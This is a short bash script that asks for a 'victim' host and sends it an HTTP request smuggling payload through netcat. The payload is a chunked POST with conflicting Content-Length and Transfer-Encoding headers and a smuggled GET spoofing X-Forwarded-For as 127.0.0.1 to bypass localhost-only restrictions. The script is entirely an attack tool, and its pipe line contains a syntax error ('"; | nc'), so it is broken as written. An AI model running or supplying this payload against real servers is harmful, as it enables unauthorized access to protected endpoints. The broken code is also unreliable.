#!/bin/bash
echo -ne "[+] Enter Victim: "
read victim

echo -ne "[+] Enter Path: "
read pagepath


echo "POST / HTTP/1.1
Host: $victim
X-Forwarded-For: 127.0.0.1
Content-Length: 200
Transfer-Encoding: chunked

0

GET / HTTP/1.1
Host: $victim
X-Forwarded-For: 127.0.0.1
X: X
GET..."; | nc $victim 80